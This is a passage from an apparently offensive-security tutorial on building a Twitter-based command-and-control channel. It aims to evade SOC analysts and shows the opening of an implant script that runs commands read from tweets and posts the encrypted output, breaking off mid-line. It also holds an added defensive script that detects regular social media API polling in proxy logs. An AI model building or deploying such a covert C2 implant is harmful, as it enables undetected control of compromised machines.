Creating a Twitter C2
Up to a certain point, requesting random pages on the Internet is passable, but once a Security Operations Centre (SOC) analyst takes a closer look at all the data that's vanishing up the tubes, it's going to be obvious that the requests are going to a dodgy site and are therefore likely associated with malicious traffic. Fortunately, social media helps out in this regard and allows us to hide data in plain sight.
We will create a script that connects to Twitter, reads tweets, performs commands based on those tweets, encrypts the response data, and posts it to Twitter. We'll also make a decode script.
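From the SOC analyst's side, traffic like this blends in by destination but not necessarily by timing. The following is an added example, not code from the original text: it flags clients that poll a social media API at near-fixed intervals. The log format, host names, user agents and thresholds are constructed assumptions, as is the idea that the implant sleeps a fixed time between polls.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log lines (assumed format): ISO time, source host, destination, user agent
SAMPLE_LOG = """\
2024-05-01T09:00:00 ws-014 api.twitter.com Python-urllib/2.7
2024-05-01T09:01:00 ws-014 api.twitter.com Python-urllib/2.7
2024-05-01T09:02:01 ws-014 api.twitter.com Python-urllib/2.7
2024-05-01T09:03:00 ws-014 api.twitter.com Python-urllib/2.7
2024-05-01T09:04:00 ws-014 api.twitter.com Python-urllib/2.7
2024-05-01T09:00:12 ws-022 api.twitter.com Mozilla/5.0
2024-05-01T09:00:14 ws-022 api.twitter.com Mozilla/5.0
2024-05-01T09:07:40 ws-022 api.twitter.com Mozilla/5.0
2024-05-01T09:31:05 ws-022 api.twitter.com Mozilla/5.0
2024-05-01T09:31:09 ws-022 api.twitter.com Mozilla/5.0
"""

WATCHED_HOSTS = {"api.twitter.com"}  # social media API endpoints to watch


def find_beacons(log, min_requests=5, max_jitter=0.1):
    """Return {(source, user agent): mean interval in seconds} for regular polling."""
    seen = defaultdict(list)
    for line in log.splitlines():
        ts, src, dest, agent = line.split(maxsplit=3)
        if dest in WATCHED_HOSTS:
            seen[(src, agent)].append(datetime.fromisoformat(ts))
    hits = {}
    for key, times in seen.items():
        if len(times) < min_requests:
            continue  # too few requests to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        # Coefficient of variation near 0 means a fixed sleep between polls;
        # interactive use produces bursts and long pauses instead.
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            hits[key] = mean
    return hits


if __name__ == "__main__":
    for (src, agent), interval in find_beacons(SAMPLE_LOG).items():
        print(f"{src} ({agent}) polls a watched host every ~{interval:.0f}s")
```

A hit is a triage lead rather than a verdict, since legitimate scheduled clients also poll on a timer; the user agent and the owning process on the host decide which it is.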
Getting Started
For this, you will need a Twitter account with an API key.
How to do it…
The script we will be using is as follows:
from twitter import *
import os
from Crypto.Cipher import ARC4
import subprocess
import time

token = ''
token_key = ''
con_secret = ''
con_secret_key = ''
t = Twitter(auth=OAuth(token, token_key, con_secret, con_secret_key))

while 1:
    user = t...